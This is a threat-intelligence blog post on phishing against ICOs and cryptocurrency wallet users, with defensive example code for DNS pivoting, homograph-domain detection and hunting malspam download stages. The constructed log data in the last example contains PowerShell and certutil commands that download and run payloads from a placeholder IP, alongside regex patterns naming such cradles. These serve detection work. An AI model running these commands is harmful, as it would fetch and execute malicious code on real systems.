Protecting ICOs and cryptocurrency users

By Artsiom Holub
Posted on September 27, 2017
Updated on July 24, 2020

A whole new world of ICO

Bitcoin and cryptocurrencies are disrupting more than the currency markets. The newly observed trend of Initial Coin Offerings (ICOs) is changing the way VCs work with startups. A recent Coindesk report states that the Bancor ICO set a record by raising $153 million in Ether from approximately 10,885 buyers. According to Coinschedule, 140 of the currently active ICOs have raised over two billion dollars, while Reuters estimates the overall value of the coin market at over $90 billion. ICOs are not yet the most popular choice among startups or investors, but interest is increasing despite the many challenges they face.

While the largest challenges for ICOs may be regulatory or legal, the focus here is on security. The issues include bugs in smart contracts, attacks on the websites of companies running an ICO, errors in the implementation of multi-signature wallets, and DDoS attacks on currency networks. Together these account for about half of cybercrime revenue in this space, with the remainder coming from phishing schemes. Chainalysis, a blockchain analysis company, estimates that phishing attacks have stolen $115 million worth of cryptocurrency from more than 16,900 victims.

Tracking phishing campaigns

Our main mechanism for identifying phishing domains is NLPRank, our machine learning-based model, which we continue to enhance to detect cryptocurrency wallet phishing. Alongside it we apply other hunting approaches that leverage our visibility into DNS data: pivoting on IP addresses, registrants, and name servers lets us expose bulletproof hosting infrastructure and block emerging attacks as soon as they go live, or before they are launched.

Automated phishing pivoting flow

Part of a phishing attack infrastructure exposed via this process:

Exposed Phishing infrastructure
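The pivot described above, as an added example: this is not Cisco Umbrella's NLPRank or its automated pivoting pipeline, only an illustration of how seed phishing domains expand into a cluster through shared IPs, name servers and registrants. The records are constructed (documentation IP ranges, `.example` domains) and stand in for passive-DNS and WHOIS lookups; the weights and thresholds are assumptions.

```python
"""Pivot from seed phishing domains to related infrastructure.

Added example, not Cisco Umbrella's tooling. RECORDS is constructed data
standing in for passive-DNS / WHOIS results: (domain, resolved IP,
authoritative name server, registrant contact).
"""

RECORDS = [
    ("blockchain-info-login.example", "203.0.113.10", "ns1.bp-host.example",  "reg1@mail.example"),
    ("myetherwallet-secure.example",  "203.0.113.10", "ns1.bp-host.example",  "reg1@mail.example"),
    ("bittrex-verify.example",        "203.0.113.11", "ns1.bp-host.example",  "reg2@mail.example"),
    ("ico-token-sale.example",        "198.51.100.7", "ns2.bp-host.example",  "reg2@mail.example"),
    ("shop.example",                  "203.0.113.10", "ns.legit-dns.example", "hostmaster@shop.example"),
    ("news.example",                  "192.0.2.50",   "ns.legit-dns.example", "hostmaster@news.example"),
]

# A shared name server or registrant is stronger evidence than a shared IP,
# because one IP often fronts many unrelated tenants (weights are assumptions).
PIVOT_WEIGHTS = {"ip": 1, "ns": 2, "registrant": 2}


def index_records(records):
    """Build {kind: {value: set(domains)}} so each pivot is a single lookup."""
    idx = {kind: {} for kind in PIVOT_WEIGHTS}
    for domain, ip, ns, registrant in records:
        for kind, value in (("ip", ip), ("ns", ns), ("registrant", registrant)):
            idx[kind].setdefault(value, set()).add(domain)
    return idx


def shared_links(candidate, cluster, attrs, idx, max_fanout):
    """Attributes the candidate shares with any cluster member.

    Attributes shared by more than max_fanout domains (shared hosting, a big
    registrar contact) are skipped: they do not discriminate.
    """
    links = []
    for kind, value in zip(("ip", "ns", "registrant"), attrs[candidate]):
        sharers = idx[kind][value]
        if len(sharers) > max_fanout:
            continue
        if sharers & cluster:
            links.append((kind, value))
    return links


def pivot(seeds, records, threshold=2, max_fanout=25):
    """Grow a cluster from seed domains until no candidate reaches the link-weight threshold.

    Returns (cluster, evidence); evidence maps each added domain to the
    links that pulled it in, so an analyst can see why it was blocked.
    """
    idx = index_records(records)
    attrs = {d: (ip, ns, r) for d, ip, ns, r in records}
    cluster = set(seeds)
    evidence = {}
    changed = True
    while changed:                      # iterate to a fixpoint: new members enable new pivots
        changed = False
        for domain in attrs:
            if domain in cluster:
                continue
            links = shared_links(domain, cluster, attrs, idx, max_fanout)
            if sum(PIVOT_WEIGHTS[kind] for kind, _ in links) >= threshold:
                cluster.add(domain)
                evidence[domain] = links
                changed = True
    return cluster, evidence


if __name__ == "__main__":
    found, why = pivot(["blockchain-info-login.example"], RECORDS)
    for d in sorted(found):
        print(d, why.get(d, "seed"))
```

Starting from the single seed, the cluster grows to four domains: two via the shared name server and registrant, and `ico-token-sale.example` only on the second hop, through the registrant it shares with `bittrex-verify.example`. `shop.example` shares an IP with the seed but nothing else, so it stays out; that weak-IP rule is what keeps a pivot from swallowing every tenant of a shared host. Real passive DNS returns many IPs per domain over time; the same logic applies with one link per (domain, IP) pair.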

Blockchain[.]info, MyEtherWallet[.]com, Bittrex[.]com, and several ICOs are among the targets of recent campaigns, whose infrastructure is tied to Russian, Ukrainian, and Hong Kong IP address space. Most phishing attempts still arrive as mass-mailed spam with generic messages; an example is shown below:

Typical message in the BTC phishing email

The majority of the phishing domains receive only a small number of hits, with an average count between 15 and 100 queries:

Query volume to the phishing domains

Other delivery methods, such as search result poisoning through paid ads, have proven an effective means of phishing users. Below, a Google search for 'myetherwallet' lists a link to a phishing site among the ads:

Phishing domain served via a poisoned Google Ads result

Such domains drive large volumes of traffic in a short period and achieve a better conversion rate than spam:

Amount of traffic to phishing domain via poisoned ad

Another important aspect of the recent campaigns is that the actors use the newer phishing techniques as well, such as IDN homograph attacks and abuse of SSL/TLS certificates (a lookalike domain with a valid certificate shows the same padlock as the real site), as the following picture shows:

Homograph attack on MyEtherWallet
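The mechanics of the homograph attack in the screenshot above, as an added example that is not Cisco Umbrella's detector: a Cyrillic letter stands in for a Latin one, the registrar sees only the punycode (`xn--`) label, and the browser renders the Unicode form. The check below decodes punycode with the standard-library IDNA codec, reduces the domain to the ASCII "skeleton" a human would see, and compares it against a brand list. The confusables table is a hand-picked subset of Unicode UTS #39, and the brand list and sample domains are constructed; it generalises beyond the screenshot to ASCII typosquats (`1` for `l`, `0` for `o`) and brand-in-domain names.

```python
"""Spot IDN homograph and look-alike domains for a list of protected brands.

Added example, not Cisco Umbrella's code. PROTECTED, CONFUSABLES and
ASCII_SWAPS are constructed for illustration.
"""
import unicodedata

PROTECTED = ("myetherwallet.com", "blockchain.info", "bittrex.com")

# Non-Latin letters that render like Latin ones (subset of UTS #39 confusables).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",  # Cyrillic а е о р с
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u0455": "s",  # Cyrillic у х і ј ѕ
    "\u03bf": "o", "\u03b1": "a", "\u03bd": "v",                                 # Greek ο α ν
}
# ASCII swaps common in typosquats: myetherwa11et, b1ockchain, 0 for o.
ASCII_SWAPS = {"0": "o", "1": "l", "3": "e", "5": "s"}


def to_unicode(domain):
    """Convert xn-- (punycode) labels back to Unicode with the stdlib IDNA codec."""
    try:
        return domain.encode("ascii").decode("idna")
    except UnicodeEncodeError:
        return domain          # already Unicode, nothing to decode
    except UnicodeError:
        return domain          # malformed punycode: compare as-is


def skeleton(domain):
    """Reduce a domain to the ASCII string a human would *see*."""
    s = unicodedata.normalize("NFKD", domain.lower())
    s = "".join(ch for ch in s if not unicodedata.combining(ch))   # strip accents: é -> e
    s = "".join(CONFUSABLES.get(ch, ch) for ch in s)               # Cyrillic/Greek -> Latin
    s = "".join(ASCII_SWAPS.get(ch, ch) for ch in s)               # digits -> letters
    return s.replace("rn", "m").replace("vv", "w")                  # multi-letter confusables


def classify(domain):
    """Return (verdict, matched_brand) for one candidate domain.

    Brands are passed through the same skeleton so the comparison is
    symmetric; only an exact string match counts as legitimate.
    """
    skel = skeleton(to_unicode(domain))
    for brand in PROTECTED:
        brand_skel = skeleton(brand)
        if skel == brand_skel:
            return ("legitimate" if domain.lower() == brand else "exact-lookalike", brand)
        if brand_skel.split(".")[0] in skel:
            return ("brand-in-domain", brand)
    return ("no-match", None)


if __name__ == "__main__":
    lookalike = "myeth\u0435rwallet.com"                       # Cyrillic е (U+0435) for Latin e
    puny = lookalike.encode("idna").decode("ascii")            # what the registrar and DNS see
    for candidate in ("myetherwallet.com", puny, "MyEtherWa11et.com", "myetherwallet-secure.example"):
        print(candidate, "->", classify(candidate))
```

The skeleton comparison is deliberately lossy: "modern" and "modem" collapse to the same string, so in production the verdict should trigger review or a block on newly registered domains rather than stand alone as proof. Note also that a valid TLS certificate says nothing here; the lookalike domain is just as eligible for one as the real site.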

IOCs

New threats are emerging

It is not only the cybercriminals historically involved in phishing who are turning to cryptocurrencies. Recently, we discovered a strain of credential stealer that targets digital wallets stored on computers as well as credentials for online services. It is delivered via malspam messages with an attached .doc file containing a PowerShell script that downloads the malware; the malware then locates stored wallets and credentials and uploads them to its command-and-control (C2) server.
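One way to catch the delivery chain described above on the endpoint, as an added example that is not Cisco Umbrella's detection content: an Office process launching a script host with a download cradle on its command line is the observable that matters, regardless of which stealer it fetches. The log lines are constructed to resemble Sysmon Event ID 1 / EDR process-creation records; the `key=value` layout, field names and indicator lists are assumptions, not any product's format.

```python
"""Hunt for Office-launched download cradles in process-creation logs.

Added example, not Cisco Umbrella's code. LOGS is constructed; the field
names (ts, host, parent, image, cmd, user) are assumptions.
"""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line fragments that fetch a payload from the network ("download cradles").
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|start-bitstransfer|bitsadmin\b.*/transfer|\bcertutil\b.*-urlcache",
    re.IGNORECASE,
)
# Flags that hide the window or skip the profile: rare for admins, common in malspam macros.
EVASIVE_RE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b|-noprofile|-noninteractive", re.IGNORECASE)

# Constructed records; values containing spaces are single-quoted.
LOGS = [
    r'''ts=2017-09-20T10:01:03Z host=WS01 parent='C:\Program Files\Microsoft Office\WINWORD.EXE' image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' cmd='powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/wallet.ps1")' user=CORP\alice''',
    r'''ts=2017-09-20T10:02:11Z host=WS02 parent='C:\Windows\explorer.exe' image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' cmd='powershell.exe Get-ChildItem C:\Users' user=CORP\bob''',
    r'''ts=2017-09-20T10:05:40Z host=WS07 parent='C:\Program Files\Microsoft Office\EXCEL.EXE' image='C:\Windows\System32\cmd.exe' cmd='cmd.exe /c certutil.exe -urlcache -split -f http://203.0.113.5/u.exe %TEMP%\u.exe' user=CORP\carol''',
    r'''ts=2017-09-20T10:06:02Z host=WS03 parent='C:\Program Files\Microsoft Office\OUTLOOK.EXE' image='C:\Program Files\Microsoft Office\WINWORD.EXE' cmd='"C:\Program Files\Microsoft Office\WINWORD.EXE" /n "C:\Users\dave\AppData\Local\Temp\invoice.doc"' user=CORP\dave''',
]

FIELD_RE = re.compile(r"(\w+)=(?:'([^']*)'|(\S+))")


def parse_line(line):
    """Parse one key=value record; single-quoted values may contain spaces."""
    return {key: quoted or bare for key, quoted, bare in FIELD_RE.findall(line)}


def basename(path):
    """Lower-cased file name of a Windows path (handles a quoted path too)."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev):
    """Return the reasons (possibly none) an event looks like a malspam download stage."""
    parent = basename(ev.get("parent", ""))
    image = basename(ev.get("image", ""))
    cmd = ev.get("cmd", "")
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"office-spawned-script-host:{parent}>{image}")
    if image in SCRIPT_HOSTS and CRADLE_RE.search(cmd):
        reasons.append("download-cradle")
    if image in {"powershell.exe", "pwsh.exe"} and EVASIVE_RE.search(cmd):
        reasons.append("evasive-powershell-flags")
    return reasons


def hunt(lines):
    """Return (host, ts, reasons) for every suspicious record, in log order."""
    hits = []
    for line in lines:
        ev = parse_line(line)
        reasons = classify_event(ev)
        if reasons:
            hits.append((ev.get("host"), ev.get("ts"), reasons))
    return hits


if __name__ == "__main__":
    for host, ts, reasons in hunt(LOGS):
        print(host, ts, ", ".join(reasons))
```

Only the two Office-to-script-host events fire: the Word-launched PowerShell cradle on WS01 with all three reasons, and the Excel-launched `certutil` download on WS07. An administrator's PowerShell session under `explorer.exe` and Outlook opening an attachment in Word produce no reasons, which is the point of keying on the parent process rather than on `powershell.exe` alone. Pair the alert with the DNS query the cradle generates and the C2 domain can be blocked for every other host at once.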

What to expect

We first observed phishing campaigns targeting cryptocurrency users in June 2016, when few people knew what an ICO was and Bitcoin's price was about $700. Now, with Bitcoin's price skyrocketing to nearly $4,000 and over 140 ICOs under way, we are sure that phishing attempts will continue to haunt ICOs and their users. Anyone who already uses cryptocurrency, or is thinking about doing so, should be very careful. Some tips to avoid becoming a victim:

  • Don't follow links in messages that claim to come from a service; remember or bookmark the services you use regularly, and avoid sponsored Google results
  • Be suspicious of messages on social media and in Slack channels, especially if they contain URLs
  • Treat messages from bots very carefully, as malicious actors can craft them easily
  • Use common sense and verify anything suspicious against the open source project itself